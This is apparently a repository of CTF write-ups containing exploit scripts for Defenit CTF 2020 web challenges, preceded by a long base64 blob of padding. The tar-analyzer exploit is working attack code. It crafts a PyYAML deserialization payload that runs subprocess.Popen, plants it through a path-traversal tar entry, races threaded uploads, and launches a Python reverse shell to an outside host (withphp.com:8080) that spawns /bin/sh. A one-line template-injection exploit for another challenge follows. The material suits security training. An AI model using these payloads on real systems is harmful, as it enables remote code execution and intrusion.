AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnlrYVhrbXU0MHBPRTJISHRJLS0NCg==


--------------------------------------------------------------------------------
/2020/Defenit_CTF/web3-tar-analyzer/exploit.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | import threading
  3 | import time
  4 | import pickle
  5 | import base64
  6 | import jsonpickle
  7 | import yaml
  8 | import subprocess
  9 | import tarfile
 10 | from copy import deepcopy
 11 | 
 12 | class Gen(object):
 13 |     def __init__(self, payload):
 14 |         self.payload = payload
 15 |     def __reduce__(self):
 16 |         return subprocess.Popen, (self.payload,)
 17 | 
 18 | class Payload(object):
 19 |     def __init__(self, cmd):
 20 |         self.filename = 'config.yaml'
 21 |         self.cmd = cmd
 22 |         self.payload = b''
 23 |     
 24 |     def yaml_payload(self):
 25 |         if "\'" in self.cmd or "\"" in self.cmd:
 26 |             self.payload = base64.b64decode("ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gcHl0aG9uCiAgLSAtYwogIC0gIl9faW1wb3J0X18oJ29zJykuc3lzdGVtKHN0cihfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoJw==") + base64.b64encode(bytes(self.cmd, 'utf-8')) + base64.b64decode("JykuZGVjb2RlKCkpKSI=")
 27 |         else:
 28 |             self.payload = bytes(yaml.dump(Gen(tuple(self.cmd.split(" ")))), 'utf-8')
 29 |         self.save_tarfile()
 30 | 
 31 |     def save_tarfile(self):
 32 |         open("../../"+self.filename, "wb").write(self.payload)
 33 |         fp = tarfile.open(".COMMAND", "w")
 34 |         fp.add("../.././config.yaml")
 35 |         fp.close()
 36 | 
 37 | def overwrite_ip() :
 38 |     headers = {
 39 |         "Host": "tar-analyzer.ctf.defenit.kr:8080",
 40 |         "Connection": "keep-alive",
 41 |         "Cache-Control": "max-age=0",
 42 |         "Upgrade-Insecure-Requests": "1",
 43 |         "Origin": "http://tar-analyzer.ctf.defenit.kr:8080",
 44 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarykaXkmu40pOE2HHtI",
 45 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
 46 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
 47 |         "Accept-Encoding": "gzip, deflate",
 48 |         "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2"
 49 |     }
 50 |     requests.post("http://tar-analyzer.ctf.defenit.kr:8080/analyze", headers=headers, data=overwrite_ip_data)
 51 |     #print("overwrite admin ip!", flush=True)
 52 | 
 53 | def overwrite_command() :
 54 |     headers = {
 55 |         "Host": "tar-analyzer.ctf.defenit.kr:8080",
 56 |         "Connection": "keep-alive",
 57 |         "Cache-Control": "max-age=0",
 58 |         "Upgrade-Insecure-Requests": "1",
 59 |         "Origin": "http://tar-analyzer.ctf.defenit.kr:8080",
 60 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryLYTyAuNetbeGL9cf",
 61 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
 62 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
 63 |         "Accept-Encoding": "gzip, deflate",
 64 |         "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2"
 65 |     }
 66 |     requests.post("http://tar-analyzer.ctf.defenit.kr:8080/analyze", headers=headers, data=cmd_data)
 67 |     #print("overwrite command!", flush=True)
 68 | 
 69 | def execute_command() :
 70 |     headers = {
 71 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
 72 |         "Accept-Encoding": "gzip, deflate",
 73 |         "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2",
 74 |         "Cache-Control": "no-cache",
 75 |         "Connection": "keep-alive",
 76 |         "Host": "tar-analyzer.ctf.defenit.kr:8080",
 77 |         "Pragma": "no-cache",
 78 |         "Upgrade-Insecure-Requests": "1",
 79 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
 80 |     }
 81 |     print(requests.get("http://tar-analyzer.ctf.defenit.kr:8080/admin", headers=headers).text)
 82 | 
 83 | def set_command(cmd) :
 84 |     payload = Payload(cmd)
 85 |     payload.yaml_payload()
 86 | 
 87 | 
 88 | overwrite_ip_data = open(".SET_ADMIN", "r").read()
 89 | overwrite_ip_data = base64.b64decode(overwrite_ip_data.encode()).decode()
 90 | cmd_data = b'------WebKitFormBoundaryLYTyAuNetbeGL9cf\r\nContent-Disposition: form-data; name="file"; filename=".COMMAND"\r\nContent-Type: application/octet-stream\r\n\r\n' + open(".COMMAND", "rb").read() + b'\r\n------WebKitFormBoundaryLYTyAuNetbeGL9cf--\r\n'
 91 | cmd_data = cmd_data.decode()
 92 | 
 93 | 
 94 | my_host = 'withphp.com'
 95 | my_port = 8080
 96 | reverse_shell = """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{}',{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);""".format(my_host, my_port)
 97 | 
 98 | set_command("python3 -c \"%s\""%(reverse_shell))
 99 | 
100 | th1, th2, th3 = [], [], []
101 | 
102 | for i in range(100) :
103 |     th1.append(threading.Thread(target=overwrite_ip, args=()))
104 |     th2.append(threading.Thread(target=overwrite_command, args=()))
105 |     th3.append(threading.Thread(target=execute_command, args=()))
106 | 
107 | for i in range(100) :
108 |     th1[i].start()
109 |     th2[i].start()
110 |     th3[i].start()
111 | 
112 | 


--------------------------------------------------------------------------------
/2020/Defenit_CTF/web4-babyjs/exploit.py:
--------------------------------------------------------------------------------
1 | print(__import__('requests').post("http://babyjs.ctf.defenit.kr/", data={"content[]": "{{FLAG}}"}).text)


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CTF Write ups
2 | 


--------------------------------------------------------------------------------